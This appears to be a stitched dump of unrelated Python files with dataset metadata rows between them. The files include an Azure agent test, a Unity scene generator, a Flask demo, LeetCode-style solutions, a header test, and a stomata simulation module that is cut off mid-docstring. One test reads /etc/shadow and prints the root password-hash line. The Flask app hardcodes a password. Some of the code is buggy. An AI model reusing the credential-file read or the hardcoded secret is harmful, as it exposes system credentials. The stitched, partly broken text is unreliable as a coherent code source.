| 33.5625 | 71 | 0.645251 | 205 | 1,074 | 3.273171 | 0.42439 | 0.014903 | 0.053651 | 0.125186 | 0.017884 | 0.017884 | 0 | 0 | 0 | 0 | 0 | 0.045564 | 0.223464 | 1,074 | 31 | 72 | 34.645161 | 0.758993 | 0 | 0 | 0 | 0 | 0 | 0.017316 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.083333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b8c9483c89fccb1526f7a1b94d89843858f14cf3 | 3,216 | py | Python | dcr/scenarios/agent-bvt/test_agent_basics.py | sshedi/WALinuxAgent | 99d07d29b7843293588bec4b961e4ef2d1daabb2 | [
"Apache-2.0"
] | null | null | null | dcr/scenarios/agent-bvt/test_agent_basics.py | sshedi/WALinuxAgent | 99d07d29b7843293588bec4b961e4ef2d1daabb2 | [
"Apache-2.0"
] | null | null | null | dcr/scenarios/agent-bvt/test_agent_basics.py | sshedi/WALinuxAgent | 99d07d29b7843293588bec4b961e4ef2d1daabb2 | [
"Apache-2.0"
] | null | null | null | import os
import re
import socket
from dotenv import load_dotenv
from dcr.scenario_utils.common_utils import execute_command_and_raise_on_error
from dcr.scenario_utils.models import get_vm_data_from_env
def test_agent_version():
stdout, _ = execute_command_and_raise_on_error(['waagent', '-version'], timeout=30)
    # the expected agent version is read from the scenario's .env file
    # (AGENTVERSION=x.y.z)
load_dotenv()
expected_version = os.environ.get("AGENTVERSION")
if "Goal state agent: {0}".format(expected_version) not in stdout:
raise Exception("expected version {0} not found".format(expected_version))
return stdout
def check_hostname():
vm_name = get_vm_data_from_env().name
stdout, _ = execute_command_and_raise_on_error(['hostname'], timeout=30)
if vm_name.lower() != stdout.lower():
raise Exception("Hostname does not match! Expected: {0}, found: {1}".format(vm_name, stdout.strip()))
return stdout
def check_ns_lookup():
hostname, _ = execute_command_and_raise_on_error(['hostname'], timeout=30)
ip = socket.gethostbyname(hostname)
msg = "Resolved IP: {0}".format(ip)
print(msg)
return msg
def check_root_login():
stdout, _ = execute_command_and_raise_on_error(['cat', '/etc/shadow'], timeout=30)
root_passwd_line = next(line for line in stdout.splitlines() if 'root' in line)
print(root_passwd_line)
root_passwd = root_passwd_line.split(":")[1]
if any(val in root_passwd for val in ("!", "*", "x")):
return 'root login disabled'
else:
raise Exception('root login appears to be enabled: {0}'.format(root_passwd))
def check_agent_processes():
daemon_pattern = r'.*python.*waagent -daemon$'
handler_pattern = r'.*python.*-run-exthandlers'
status_pattern = r'^(\S+)\s+'
std_out, _ = execute_command_and_raise_on_error(['ps', 'axo', 'stat,args'], timeout=30)
daemon = False
ext_handler = False
agent_processes = [line for line in std_out.splitlines() if 'python' in line]
for process in agent_processes:
if re.match(daemon_pattern, process):
daemon = True
elif re.match(handler_pattern, process):
ext_handler = True
else:
continue
        status = re.match(status_pattern, process).group(1)
if not(status.startswith('S') or status.startswith('R')):
raise Exception('process is not running: {0}'.format(process))
if not daemon:
raise Exception('daemon process not found:\n\n{0}'.format(std_out))
if not ext_handler:
raise Exception('extension handler process not found:\n\n{0}'.format(std_out))
return 'expected processes found running'
def check_sudoers(user):
found = False
root = '/etc/sudoers.d/'
for f in os.listdir(root):
sudoers = os.path.join(root, f)
with open(sudoers) as fh:
for entry in fh.readlines():
if entry.startswith(user) and 'ALL=(ALL)' in entry:
print('entry found: {0}'.format(entry))
found = True
if not found:
raise Exception('user {0} not found'.format(user))
return "Found user {0} in list of sudoers".format(user)
| 30.923077 | 109 | 0.661692 | 440 | 3,216 | 4.631818 | 0.290909 | 0.024043 | 0.050049 | 0.064769 | 0.156035 | 0.140334 | 0.111874 | 0.074583 | 0.074583 | 0 | 0 | 0.009921 | 0.216418 | 3,216 | 103 | 110 | 31.223301 | 0.79881 | 0.014303 | 0 | 0.057143 | 0 | 0 | 0.172403 | 0.00821 | 0 | 0 | 0 | 0 | 0 | 1 | 0.085714 | false | 0.071429 | 0.085714 | 0 | 0.257143 | 0.042857 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
b8ca7c27c5d04fb6e63bdc64ba80458973c7d303 | 9,033 | py | Python | src/DrawingEpisodes.py | Benykoz/simcom | ffe1c3636ef65a037a34e71d5cbcdb2e483d5b93 | [
"MIT"
] | null | null | null | src/DrawingEpisodes.py | Benykoz/simcom | ffe1c3636ef65a037a34e71d5cbcdb2e483d5b93 | [
"MIT"
] | null | null | null | src/DrawingEpisodes.py | Benykoz/simcom | ffe1c3636ef65a037a34e71d5cbcdb2e483d5b93 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
#
# This file mainly provides a class "randomEpisode" that:
# - draws a random vehicle position
# - draws a random number of rocks
# - draws a random position for each rock
# - saves the resulting scene to a JSON file
# Author: Michele
# Project: SmartLoader - Innovation
import json
import random
from geometry_msgs.msg import PoseStamped, Quaternion, Vector3
from math import pi
import src.Unity2RealWorld as toRW
import os
def deleteFileIfExists(filename):
if os.path.exists(filename):
os.remove(filename)
else:
print("The file does not exist")
def find(name, path):
for root, dirs, files in os.walk(path):
if name in files or name in dirs:
return os.path.join(root, name)
def determinePathToConfig():
user=os.getenv("HOME")
simcomloc = find("simcom", user)
confpath = simcomloc+"/config"
return confpath
class randomEpisode:
actual_seed=0
# data = {}
# data['Objects'] = []
# NumberOfRocks = 0
# VehiclePosition= PoseStamped()
def __init__(self, typeOfRand, newseed):
data = {}
data['Objects'] = []
NumberOfRocks = 0
VehiclePosition = PoseStamped()
        if newseed != 0:
            random.seed(None, 2)  # re-seed from system entropy; seed() returns None, so there is nothing to store
if typeOfRand == "verysimple":
NumberOfRocks = random.randint(1,10)
else:
NumberOfRocks = random.randint(1,10)
VehiclePosition.pose.position.x = random.uniform(0,500)
VehiclePosition.pose.position.y = 0
VehiclePosition.pose.position.z = random.uniform(0,500)
euler_orient = Vector3()
euler_orient.x = 0
euler_orient.y = random.uniform(-pi,pi)
euler_orient.z = 0 #random.uniform(-pi,pi)
quat_orient = toRW.euler_to_quaternion(euler_orient.x, euler_orient.y, euler_orient.z)
VehiclePosition.pose.orientation.x = quat_orient[0] #random.uniform(-1,1)
VehiclePosition.pose.orientation.y = quat_orient[1] #random.uniform(-1,1)
VehiclePosition.pose.orientation.z = quat_orient[2] #random.uniform(-1,1)
VehiclePosition.pose.orientation.w = quat_orient[3] #random.uniform(-1,1)
data['Objects'].append({
'Name': 'BobCat',
'Id': 'BobCat',
'Position':
{
'x': VehiclePosition.pose.position.x,
'y': VehiclePosition.pose.position.y,
'z': VehiclePosition.pose.position.z
},
'Rotation':
{
'x': VehiclePosition.pose.orientation.x,
'y': VehiclePosition.pose.orientation.y,
'z': VehiclePosition.pose.orientation.z,
'w': VehiclePosition.pose.orientation.w
},
'Scale':
{
'x': 1,
'y': 1,
'z': 1
}
})
BobcatX = VehiclePosition.pose.position.x
BobcatZ = VehiclePosition.pose.position.z
XMin = BobcatX - 1
XMax = BobcatX + 1
ZMin = BobcatZ - 1.5
ZMax = BobcatZ + 1.5
for i in range(NumberOfRocks):
            id = str(i + 1)
eulerRot = Vector3()
eulerRot.x = 0
eulerRot.y = random.uniform(-pi, pi)
eulerRot.z = 0 #random.uniform(-pi, pi)
quatRot = toRW.euler_to_quaternion(eulerRot.x, eulerRot.y, eulerRot.z)
data['Objects'].append({
'Name': 'Rock',
'Id': id,
'Position':
{
"x": random.uniform(XMin,XMax),
"y": 0,
"z": random.uniform(ZMin,ZMax)
},
"Rotation":
{
"x": quatRot[0], #random.uniform(-1,1),
"y": quatRot[1], #random.uniform(-1,1),
"z": quatRot[2], #random.uniform(-1,1),
"w": quatRot[3] #random.uniform(-1,1)
},
"Scale":
{
"x": 0.01,
"y": 0.01,
"z": 0.01
}
})
# deleteFileIfExists('/home/sload/ws/interfaces/src/simcom/config/InitialScene.json')
filepath = determinePathToConfig()+"/InitialScene.json"
with open(filepath, 'w') as outfile:
json.dump(data, outfile)
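# MultipleRocksEpisode: fixed vehicle pose at (250, 0, 250), a cluster of rocks
# drawn just ahead of it, and an optional single marker rock placed further out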
class MultipleRocksEpisode:
# actual_seed=0
# data = {}
# data['Objects'] = []
# NumberOfRocks = 0
# VehiclePosition= PoseStamped()
def __init__(self, newseed, NumberOfRocks, marker):
data = {}
data['Objects'] = []
VehiclePosition = PoseStamped()
        if newseed != 0:
            random.seed(None, 2)  # re-seed from system entropy; seed() returns None
VehiclePosition.pose.position.x = 250
VehiclePosition.pose.position.y = 0
VehiclePosition.pose.position.z = 250
euler_orient = Vector3()
euler_orient.x = 0
euler_orient.y = pi/2 #random.uniform(-pi,pi)
euler_orient.z = 0 #random.uniform(-pi,pi)
quat_orient = toRW.euler_to_quaternion(euler_orient.x, euler_orient.y, euler_orient.z)
VehiclePosition.pose.orientation.x = quat_orient[0] #random.uniform(-1,1)
VehiclePosition.pose.orientation.y = quat_orient[1] #random.uniform(-1,1)
VehiclePosition.pose.orientation.z = quat_orient[2] #random.uniform(-1,1)
VehiclePosition.pose.orientation.w = quat_orient[3] #random.uniform(-1,1)
data['Objects'].append({
'Name': 'BobCat',
'Id': 'BobCat',
'Position':
{
'x': VehiclePosition.pose.position.x,
'y': VehiclePosition.pose.position.y,
'z': VehiclePosition.pose.position.z
},
'Rotation':
{
'x': VehiclePosition.pose.orientation.x,
'y': VehiclePosition.pose.orientation.y,
'z': VehiclePosition.pose.orientation.z,
'w': VehiclePosition.pose.orientation.w
},
'Scale':
{
'x': 1,
'y': 1,
'z': 1
}
})
for i in range(NumberOfRocks):
            id = str(i + 1)
eulerRot = Vector3()
eulerRot.x = 0
eulerRot.y = random.uniform(-pi, pi)
eulerRot.z = 0 #random.uniform(-pi, pi)
quatRot = toRW.euler_to_quaternion(eulerRot.x, eulerRot.y, eulerRot.z)
data['Objects'].append({
'Name': 'Rock',
'Id': id,
'Position':
{
"x": 253,
"y": 0,
"z": 250 + random.uniform(-0.5,0.5)
},
"Rotation":
{
"x": quatRot[0], #random.uniform(-1,1),
"y": quatRot[1], #random.uniform(-1,1),
"z": quatRot[2], #random.uniform(-1,1),
"w": quatRot[3] #random.uniform(-1,1)
},
"Scale":
{
"x": 0.25,
"y": 0.25,
"z": 0.25
}
})
if marker:
            id = str(NumberOfRocks + 1)
eulerRot = Vector3()
eulerRot.x = 0
eulerRot.y = random.uniform(-pi, pi)
eulerRot.z = 0 #random.uniform(-pi, pi)
quatRot = toRW.euler_to_quaternion(eulerRot.x, eulerRot.y, eulerRot.z)
data['Objects'].append({
'Name': 'Rock',
'Id': id,
'Position':
{
# "x": 250 + random.uniform(XMin,XMax),
# "x": 258 + random.uniform(-1, 8),
"x": 250 + random.uniform(6, 12),
"y": 0,
"z": 250
},
"Rotation":
{
"x": quatRot[0], #random.uniform(-1,1),
"y": quatRot[1], #random.uniform(-1,1),
"z": quatRot[2], #random.uniform(-1,1),
"w": quatRot[3] #random.uniform(-1,1)
},
"Scale":
{
"x": 0.1,
"y": 0.1,
"z": 0.1
}
})
filepath = determinePathToConfig()+"/InitialScene.json"
with open(filepath,'w') as outfile:
json.dump(data, outfile)
if __name__ == '__main__':
    for j in range(3):
        # the original called an undefined `recorderEpisode`; the random scene
        # generator defined above is assumed to be the intended class
        scenario = randomEpisode("verysimple", j)
| 35.14786 | 94 | 0.469169 | 876 | 9,033 | 4.760274 | 0.166667 | 0.118465 | 0.070504 | 0.071942 | 0.7 | 0.686091 | 0.679856 | 0.672902 | 0.672902 | 0.645564 | 0 | 0.033656 | 0.404627 | 9,033 | 256 | 95 | 35.285156 | 0.741726 | 0.128418 | 0 | 0.59447 | 0 | 0 | 0.046779 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.023041 | false | 0 | 0.032258 | 0 | 0.078341 | 0.004608 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b8cbfca6de86ee3ef9fe472b32eb107264c928c8 | 1,671 | py | Python | EDA/src/utils/main_flask.py | paleomau/MGOL_BOOTCAMP | 8c2b018f49fd12a255ea6f323141260d04d4421d | [
"MIT"
] | null | null | null | EDA/src/utils/main_flask.py | paleomau/MGOL_BOOTCAMP | 8c2b018f49fd12a255ea6f323141260d04d4421d | [
"MIT"
] | null | null | null | EDA/src/utils/main_flask.py | paleomau/MGOL_BOOTCAMP | 8c2b018f49fd12a255ea6f323141260d04d4421d | [
"MIT"
] | null | null | null | from flask import Flask, request, render_template
from functions import read_json
import os
# Mandatory
app = Flask(__name__) # __name__ --> __main__
# ---------- Flask functions ----------
@app.route("/") # @ --> esto representa el decorador de la función
def home():
""" Default path """
#return app.send_static_file('greet.html')
return "Por defecto"
@app.route("/greet")
def greet():
username = request.args.get('name')
return render_template('index.html', name=username)
@app.route("/info")
def create_json():
import pandas as pd
df = pd.read_csv('lung_nn_outl.csv')
return df.to_json()
# localhost:6060/give_me_id?password=12345
@app.route('/give_me_id', methods=['GET'])
def give_id():
token_id = request.args['password']
if token_id == "p10875558":
return request.args
else:
return "No es la contraseña correcta"
@app.route("/recibe_informacion")
def recibe_info():
pass
# ---------- Other functions ----------
def main():
print("---------STARTING PROCESS---------")
print(__file__)
# Get the settings fullpath
# \\ --> WINDOWS
# / --> UNIX
    # For both: os.sep
settings_file = os.path.dirname(__file__) + os.sep + "settings.json"
print(settings_file)
# Load json from file
json_readed = read_json(fullpath=settings_file)
# Load variables from jsons
DEBUG = json_readed["debug"]
HOST = json_readed["host"]
PORT_NUM = json_readed["port"]
    # Two possibilities:
# HOST = "0.0.0.0"
# HOST = "127.0.0.1" --> localhost
app.run(debug=DEBUG, host=HOST, port=PORT_NUM)
if __name__ == "__main__":
main() | 25.318182 | 72 | 0.625972 | 214 | 1,671 | 4.621495 | 0.443925 | 0.040445 | 0.016178 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020331 | 0.205266 | 1,671 | 66 | 73 | 25.318182 | 0.724398 | 0.264512 | 0 | 0 | 0 | 0 | 0.164735 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.157895 | false | 0.052632 | 0.105263 | 0 | 0.394737 | 0.078947 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
b8df7da99167063e92023aa153878ad215a2e8ff | 2,476 | py | Python | leet.py | blackcow/pytorch-cifar-master | c571c8fd7fe521907755ca2eacb6aa877abe3493 | [
"MIT"
] | null | null | null | leet.py | blackcow/pytorch-cifar-master | c571c8fd7fe521907755ca2eacb6aa877abe3493 | [
"MIT"
] | null | null | null | leet.py | blackcow/pytorch-cifar-master | c571c8fd7fe521907755ca2eacb6aa877abe3493 | [
"MIT"
] | null | null | null | # Problem 1:
import io
import sys
sys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding='utf-8')
#str = input()
#print(str)
class Solution(object):
def findMedium(l):
length = len(l)
l.sort()
        # if the list length is odd, print the middle element
if length % 2 != 0:
print(l[length//2])
        # if it is even, print the mean of the two middle elements
else:
print((l[length//2-1] + l[length//2])/2)
l = [1, 3, 5, 2, 8, 7]
Solution.findMedium(l)
# Problem 2:
import io
import sys
sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8')
# str = input()
# print(str)
class Solution:
def maxStr(str_in):
        # initialization
length = len(str_in)
count = [0 for i in range(26)]
char_a = ord('a')
        # count character occurrences
for i in range(length):
count[ord(str_in[i]) - char_a] += 1
last = str_in[0]
num = 1
res = 1
for m in range(1, length):
            # different character
if last != str_in[m]:
tmp_idx = m
while (tmp_idx + 1 < length) and (last == str_in[tmp_idx + 1]):
num += 1
tmp_idx += 1
if count[ord(last) - char_a] > num:
num += 1
num, res = 1, max(num, res)
last = str_in[m]
            # same character: keep accumulating
else:
num += 1
if (num > 1) and (count[ord(last) - char_a] > num):
num += 1
        # after finding the max length, scan the string for the substring
max_length = max(num, res)
str2ls = list(str_in)
for i in count:
if i != max_length:
str2ls = str2ls[i:]
else:
str2ls = str2ls[:max_length]
out = ''.join(str2ls)
print(out)
return (out)
text = 'abbbbcccddddddddeee'
Solution.maxStr(text)
# Problem 3:
import io
import sys
sys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding='utf-8')
#str = input()
#print(str)
class Solution:
def findMaxArray(l):
        # initialization
tmp = l[0]
max_val = tmp
length = len(l)
for i in range(1, length):
            # extend the running sum and track the current maximum
if tmp + l[i] > l[i]:
max_val = max(max_val, tmp + l[i])
tmp = tmp + l[i]
            # otherwise the sequence ends here; record the maximum so far
else:
max_val = max(max_val, tmp, tmp+l[i], l[i])
tmp = l[i]
print(max_val)
return max_val
l = [1, -2, 4, 5, -1, 1]
Solution.findMaxArray(l) | 23.358491 | 79 | 0.468094 | 328 | 2,476 | 3.454268 | 0.234756 | 0.035305 | 0.022065 | 0.045013 | 0.348632 | 0.336275 | 0.304501 | 0.304501 | 0.262136 | 0.262136 | 0 | 0.031821 | 0.403473 | 2,476 | 106 | 80 | 23.358491 | 0.735274 | 0.07189 | 0 | 0.283784 | 0 | 0 | 0.015331 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.081081 | null | null | 0.054054 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b8e9db6f289a79604e54db518d87b8a53a1a0672 | 504 | py | Python | weasyl/test/test_http.py | hyena/weasyl | a43ad885eb07ae89d6639f289a5b95f3a177439c | [
"Apache-2.0"
] | 111 | 2016-05-18T04:18:18.000Z | 2021-11-03T02:05:19.000Z | weasyl/test/test_http.py | hyena/weasyl | a43ad885eb07ae89d6639f289a5b95f3a177439c | [
"Apache-2.0"
] | 1,103 | 2016-05-29T05:17:53.000Z | 2022-03-31T18:12:40.000Z | weasyl/test/test_http.py | TheWug/weasyl | a568a542cc58c11e30621fb672c701531d4306a8 | [
"Apache-2.0"
] | 47 | 2016-05-29T20:48:37.000Z | 2021-11-12T09:40:40.000Z | import pytest
from weasyl import http
@pytest.mark.parametrize(('wsgi_env', 'expected'), [
({}, {}),
({'PATH_INFO': '/search', 'QUERY_STRING': 'q=example'}, {}),
({'HTTP_ACCEPT': '*/*'}, {'Accept': '*/*'}),
(
{'CONTENT_LENGTH': '', 'HTTP_ACCEPT_ENCODING': 'gzip', 'HTTP_UPGRADE_INSECURE_REQUESTS': '1'},
{'Accept-Encoding': 'gzip', 'Upgrade-Insecure-Requests': '1'},
),
])
def test_get_headers(wsgi_env, expected):
assert http.get_headers(wsgi_env) == expected
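

# For reference, a minimal sketch of the behavior these cases pin down; the
# real weasyl.http.get_headers implementation may differ in its details:
def _get_headers_sketch(wsgi_env):
    headers = {}
    for key, value in wsgi_env.items():
        if key.startswith('HTTP_'):
            # e.g. HTTP_ACCEPT_ENCODING -> Accept-Encoding
            name = '-'.join(part.capitalize() for part in key[5:].split('_'))
            headers[name] = value
    return headers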
| 29.647059 | 102 | 0.603175 | 54 | 504 | 5.351852 | 0.574074 | 0.072664 | 0.155709 | 0.16609 | 0.17301 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004751 | 0.164683 | 504 | 16 | 103 | 31.5 | 0.68171 | 0 | 0 | 0 | 0 | 0 | 0.376984 | 0.109127 | 0 | 0 | 0 | 0 | 0.076923 | 1 | 0.076923 | false | 0 | 0.153846 | 0 | 0.230769 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b8ea0aefe02a0ac8e734a613a8836ee2fbeec6cf | 421 | py | Python | chords/neural_network/classifier.py | fernando-figueredo/ChordsWebApp | 9bf983ab5579c36c75447c74eec0400d78ab49f9 | [
"MIT"
] | 2 | 2021-03-30T01:09:51.000Z | 2022-03-10T21:17:15.000Z | chords/neural_network/classifier.py | fernando-figueredo/ChordsWebApp | 9bf983ab5579c36c75447c74eec0400d78ab49f9 | [
"MIT"
] | null | null | null | chords/neural_network/classifier.py | fernando-figueredo/ChordsWebApp | 9bf983ab5579c36c75447c74eec0400d78ab49f9 | [
"MIT"
] | null | null | null | from neural_network.train import Trainer
class Classifier():
def __init__(self, train=False):
self.train = train
self.trainer = Trainer()
if not self.train:
self.trainer.load()
else:
self.trainer.train()
def classify(self, audio_file_path):
#prediction = self.trainer.predict(audio_file_path)
self.trainer.plot_prediction(audio_file_path) | 28.066667 | 59 | 0.643705 | 50 | 421 | 5.18 | 0.46 | 0.212355 | 0.150579 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.261283 | 421 | 15 | 60 | 28.066667 | 0.832797 | 0.118765 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0 | 0.090909 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b8ea2be5c0eee4133b1b628fc992cd2fbe84768f | 556 | py | Python | cybox/common/metadata.py | tirkarthi/python-cybox | a378deb68b3ac56360c5cc35ff5aad1cd3dcab83 | [
"BSD-3-Clause"
] | 40 | 2015-03-05T18:22:51.000Z | 2022-03-06T07:29:25.000Z | cybox/common/metadata.py | tirkarthi/python-cybox | a378deb68b3ac56360c5cc35ff5aad1cd3dcab83 | [
"BSD-3-Clause"
] | 106 | 2015-01-12T18:52:20.000Z | 2021-04-25T22:57:52.000Z | cybox/common/metadata.py | tirkarthi/python-cybox | a378deb68b3ac56360c5cc35ff5aad1cd3dcab83 | [
"BSD-3-Clause"
] | 30 | 2015-03-25T07:24:40.000Z | 2021-07-23T17:10:11.000Z | # Copyright (c) 2020, The MITRE Corporation. All rights reserved.
# See LICENSE.txt for complete terms.
from mixbox import entities, fields
import cybox.bindings.cybox_common as common_binding
class Metadata(entities.Entity):
_binding = common_binding
_binding_class = common_binding.MetadataType
_namespace = 'http://cybox.mitre.org/common-2'
type_ = fields.TypedField("type_", key_name="type")
value = fields.TypedField("Value")
subdatum = fields.TypedField("SubDatum", type_="cybox.common.metadata.Metadata", multiple=True)
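
# Illustrative instantiation (attribute behavior assumed from the TypedField
# declarations above, not taken from cybox documentation):
#   m = Metadata()
#   m.type_ = "file-hash"
#   m.value = "example"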
| 32.705882 | 99 | 0.753597 | 69 | 556 | 5.898551 | 0.594203 | 0.095823 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010438 | 0.138489 | 556 | 16 | 100 | 34.75 | 0.839248 | 0.178058 | 0 | 0 | 0 | 0 | 0.182819 | 0.066079 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.222222 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
b8f295ce12bf7401ea1d40884fb3f417f25a7bfd | 6,907 | py | Python | stomasimulator/febio/xplt/xplt_calcs.py | woolfeh/stomasimulator | ead78b78809f35c17e2d784259bdeb56589a9d1c | [
"MIT"
] | 2 | 2017-07-27T12:57:26.000Z | 2017-07-28T13:55:15.000Z | stomasimulator/febio/xplt/xplt_calcs.py | woolfeh/stomasimulator | ead78b78809f35c17e2d784259bdeb56589a9d1c | [
"MIT"
] | null | null | null | stomasimulator/febio/xplt/xplt_calcs.py | woolfeh/stomasimulator | ead78b78809f35c17e2d784259bdeb56589a9d1c | [
"MIT"
] | 1 | 2020-06-02T15:31:04.000Z | 2020-06-02T15:31:04.000Z | import stomasimulator.geom.geom_utils as geom
class AttributeCalculator(object):
""" Abstraction for calculations performed on XPLT state data """
def __init__(self, prefix, reference_data, dimensionality, lambda_fn=None):
self.prefix = '' if prefix is None else prefix
self.reference_data = reference_data
self.dimensionality = dimensionality
self.lambda_fn = (lambda x: x) if lambda_fn is None else lambda_fn
def calculate(self, nid_pt_dict, extras=None):
""" Perform the calculation
:param nid_pt_dict: dictionary of an integer 'node id' to a Point object
:param extras: passed on to the subclass
:return: a dictionary containing label-result pairs from the calculation
:rtype: dict
"""
data = self._calculate(nid_pt_dict, extras)
if self.dimensionality == 1:
data = (data,)
return {k: self.lambda_fn(v) for k, v in zip(self.labels(), data)}
def _calculate(self, nid_pt_dict, extras):
""" Calculation implementation - to be overridden in subclasses """
pass
def labels(self):
""" Get the labels for the calculation results """
suffices = self.calculation_suffices()
assert len(suffices) == self.dimensionality, 'Error! Data label dimensionality mismatch.'
fmt_string = '{}{}' if len(self.prefix) == 0 or len(suffices[0]) == 0 else '{}-{}'
return [fmt_string.format(self.prefix, suffix) for suffix in suffices]
def calculation_suffices(self):
""" These suffices are appended to the labels of the calculation result """
return ['', ] * self.dimensionality
def _get_point(ref_pt, id_pt_dict):
return id_pt_dict.get(ref_pt) if isinstance(ref_pt, int) else ref_pt
class DistanceCalculator(AttributeCalculator):
""" Distance between two points """
def __init__(self, prefix, node_pair, lambda_fn=None):
node_0 = node_pair[0]
node_1 = node_pair[1]
reference_data = (node_0 if node_0.id is None else node_0.id,
node_1 if node_1.id is None else node_1.id)
super(DistanceCalculator, self).__init__(prefix=prefix,
reference_data=reference_data,
dimensionality=1,
lambda_fn=lambda_fn)
def _calculate(self, nid_pt_dict, extras):
pt_0 = _get_point(self.reference_data[0], nid_pt_dict)
pt_1 = _get_point(self.reference_data[1], nid_pt_dict)
return pt_0.distance(pt_1)
class DirectionalDistanceCalculator(DistanceCalculator):
""" Signed distance calculator """
def __init__(self, prefix, node_pair, direction, lambda_fn=None):
""" Calculate a distance in a specified direction
:param prefix:
:param node_pair: two Points - further along 'direction' than node_pair[1] so that 'np[0] - np[1]'
should be in the direction of 'direction'
:param direction: the direction vector
:param lambda_fn:
"""
super(DirectionalDistanceCalculator, self).__init__(prefix=prefix,
node_pair=node_pair,
lambda_fn=lambda_fn)
self.direction = direction.unit()
def _calculate(self, nid_pt_dict, extras):
pt_0 = _get_point(self.reference_data[0], nid_pt_dict)
pt_1 = _get_point(self.reference_data[1], nid_pt_dict)
is_in_right_direction = (pt_0 - pt_1) * self.direction > 0.0
return pt_0.distance(pt_1) if is_in_right_direction else 0.0
class AreaCalculator2D(AttributeCalculator):
""" Calculate area from a list of points (assumed to be in xy plane) """
def __init__(self, prefix, boundary_pts, lambda_fn=None):
super(AreaCalculator2D, self).__init__(prefix=prefix,
reference_data=boundary_pts,
dimensionality=1,
lambda_fn=lambda_fn)
def _calculate(self, nid_pt_dict, extras):
updated_pore_pts = [nid_pt_dict[pt.id] for pt in self.reference_data]
pore_area = geom.calculate_polygon_area(updated_pore_pts)
return pore_area
class AreaCalculator3D(AttributeCalculator):
""" Calculate an area from a list of facets """
def __init__(self, prefix, facet_list):
super(AreaCalculator3D, self).__init__(prefix=prefix,
reference_data=facet_list,
dimensionality=1)
def _calculate(self, nid_pt_dict, extras):
area = geom.calculate_surface_area(nid_pt_dict, self.reference_data)
return area
class AreaVolumeCalculator(AttributeCalculator):
""" Perform a combined calculation to get the surface area and volume given a list of facets """
def __init__(self, prefix, facet_list):
super(AreaVolumeCalculator, self).__init__(prefix=prefix,
reference_data=facet_list,
dimensionality=2)
def _calculate(self, nid_pt_dict, extras):
volume, area = geom.calculate_volume_and_area(nid_pt_dict, self.reference_data)
return area, volume
def calculation_suffices(self):
return 'area', 'volume'
class XpltReaderMetrics(object):
""" Identify the metrics that will be calculated for the XpltReader """
def __init__(self, comparison_helper=None, is_mesh_calculation_on=False):
"""
:param comparison_helper: Comparison helper for the stoma
        :type comparison_helper: sc.ComparisonHelper
:param is_mesh_calculation_on: Whether to calculate the mesh metrics (or not)
:type is_mesh_calculation_on: bool
"""
self.comparison_helper = comparison_helper
self.is_mesh_calculation_on = is_mesh_calculation_on
@property
def is_compare_vs_open_stoma_on(self):
"""
:return: Whether or not to perform the comparison
:rtype: bool
"""
return self.comparison_helper is not None
def evaluate_metric(self, sim_state):
"""
Calculate the metric and percent difference vs. each measurement
:param sim_state: State object holding data from the simulation
:type sim_state: State
